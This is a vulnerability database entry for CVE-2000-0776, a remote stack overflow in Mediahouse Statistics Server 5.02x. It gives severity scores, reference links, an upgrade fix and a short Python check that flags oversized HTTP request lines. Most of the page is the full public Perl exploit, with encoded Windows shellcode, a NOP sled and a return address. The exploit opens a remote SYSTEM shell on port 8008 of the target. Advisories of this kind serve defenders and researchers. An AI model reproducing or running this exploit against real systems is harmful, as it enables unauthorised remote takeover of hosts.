CVE-2000-0776
CVSS7.5
Published: 2000-10-20 00:00:00
Revised: 2008-09-05 16:21:51

[Original] Mediahouse Statistics Server 5.02x allows remote attackers to execute arbitrary commands via a long HTTP GET request.


[CNNVD] Mediahouse Statistics Server Command Execution Vulnerability (CNNVD-200010-064)

Mediahouse Statistics Server 5.02x is vulnerable. A remote attacker can execute arbitrary commands by means of an over-long HTTP GET request.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0776
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0776
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-064
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1568
(VENDOR_ADVISORY)  BID  1568
http://archives.neohapsis.com/archives/bugtraq/2000-08/0118.html
(VENDOR_ADVISORY)  BUGTRAQ  20000810 [DeepZone Advisory] Statistics Server 5.02x stack overflow (Win2k remote exploit)
http://xforce.iss.net/static/5113.php
(UNKNOWN)  XF  mediahouse-stats-livestats-bo(5113)

- Vulnerability information

Mediahouse Statistics Server Command Execution Vulnerability
High Unknown
2000-10-20 00:00:00 2005-08-17 00:00:00
Remote
Mediahouse Statistics Server 5.02x is vulnerable. A remote attacker can execute arbitrary commands by means of an over-long HTTP GET request.

- Advisories and patches


- Vulnerability information (20148)

MediaHouse Software Statistics Server LiveStats 5.2 Buffer Overflow Vulnerability (EDBID:20148)
windows remote
2000-08-10 Verified
0 Zan
N/A
source: http://www.securityfocus.com/bid/1568/info

Mediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash or can be forced to execute arbitrary code.
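A defender-side check derived from the description above, added here as an example and not code from the advisory or the vendor: it parses the request line of a raw HTTP request and flags a URI longer than the 2030-byte limit the text gives, or one carrying non-printable bytes (the usual sign of an injected binary payload). The two sample requests are constructed for the demonstration.

```python
# Constructed example: flag HTTP request lines that match the shape of the
# Statistics Server 5.02x overflow (URI over 2030 bytes, binary content).
MAX_URI_BYTES = 2030  # limit stated in the advisory text


def parse_request_line(first_line: bytes):
    """Split 'METHOD URI [HTTP/x.y]' without assuming the URI is printable.
    Returns (method, uri); method is None if there is no space at all."""
    parts = first_line.split(b" ", 1)
    if len(parts) < 2:
        return None, first_line
    method, rest = parts
    head, sep, tail = rest.rpartition(b" ")
    # Drop a trailing HTTP version token if present; HTTP/0.9-style
    # requests (as in the public exploit) have none.
    if sep and tail.startswith(b"HTTP/"):
        return method, head
    return method, rest


def inspect_request(raw: bytes) -> dict:
    """Return the indicators a detection rule for this bug would look at."""
    first_line = raw.split(b"\r\n", 1)[0]
    method, uri = parse_request_line(first_line)
    binary = sum(1 for b in uri if b < 0x20 or b > 0x7E)
    oversized = len(uri) > MAX_URI_BYTES
    return {
        "method": method.decode("ascii", "replace") if method else None,
        "uri_len": len(uri),
        "oversized": oversized,
        "binary_bytes": binary,
        "flagged": oversized or binary > 0,
    }


# Constructed samples: a normal request and one mimicking the overflow shape
# (absolute URI followed by a long run of NOP bytes, no shellcode).
BENIGN = b"GET /stats/index.html HTTP/1.0\r\nHost: stats.example.test\r\n\r\n"
OVERSIZED = b"GET http://O" + b"\x90" * 2100 + b"\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, inspect_request(req))
```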


#!/usr/bin/perl -w
# Statistics Server 5.02x's exploit. 
# usage: ./ssexploit502x.pl hostname port
# 00/08/10
# http://www.deepzone.org
# http://deepzone.cjb.net       
# http://mareasvivas.cjb.net  (|Zan homepage)
#
# --|Zan <izan@deepzone.org>
# ----------------------------------------------------------------
#
# This exploit works against Statistics Server 5.02x/Win2k.
#
# Tested with Win2k (spanish version).
#
# It spawns a remote winshell on 8008 port. It doesn't kill
# webserver so webserver continues running while hack is made.
# When hack is finished webserver will run perfectly too.
#
# Default installation gives us a remote shell with system
# privileges.
#
# overflow discovered by
# -- Nemo <nemo@deepzone.org>
#
# exploit coded by
# -- |Zan <izan@deepzone.org>
#
# ----------------------------------------------------------------

use IO::Socket;


@crash = (
"\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
"\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
"\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
"\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
"\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
"\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
"\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
"\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
"\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
"\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
"\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
"\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
"\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
"\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
"\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
"\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
"\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
"\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
"\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
"\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
"\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
"\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
"\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
"\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
"\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
"\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
"\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
"\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
"\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
"\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
"\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
"\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
"\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
"\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
"\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
"\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
"\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
"\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
"\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
"\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
"\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
"\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
"\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
"\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
"\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
"\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
"\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
"\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
"\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
"\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
"\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
"\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
"\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
"\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
"\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
"\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
"\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
"\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
"\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
"\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
"\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
"\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
"\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
"\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
"\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
"\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
"\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
"\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
"\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
"\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
"\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
"\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
"\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
"\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
"\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
"\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
"\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
"\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
"\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
"\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
"\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
"\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
"\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
"\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
"\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
"\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
"\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
"\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
"\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
"\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
"\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");

# -------------------------------------------------------------------

sub pcommands
{
	die "usage: $0 hostname port\n" if (@ARGV != 2);
	($host) = shift @ARGV;
	($port) = shift @ARGV;
}

sub show_credits
{
	print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's exploit\n";
	print "\n\t\t  Coded by |Zan - izan\@deepzone.org\n";
	print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-\n\n";
}

sub bofit
{

	print "\nspawning remote shell on port 8008 ...\n\n";

	$s = IO::Socket::INET->new(PeerAddr=>$host,
                                   PeerPort=>$port,
				   Proto=>"tcp");

	if(!$s) { die "error.\n"; }	

	print $s "GET http://O";

	foreach $item (@crash) {
        	print $s $item
              } 

	for ($cont=0; $cont<840;$cont++) {
		print $s "\x90"
              }

	print $s "\x8c\x3e\x1d\x01";

	print $s "\r\n\r\n";

	while (<$s>) { print }

	print "... done.\n\n";

}

# ----- begin

show_credits;
pcommands;
bofit;

# ----- that's all :)

- Vulnerability information

1507
Mediahouse Statistics Server HTTP GET Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-08-10 Unknown
Unknown Unknown

- Solution

Upgrade to version 5.03 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete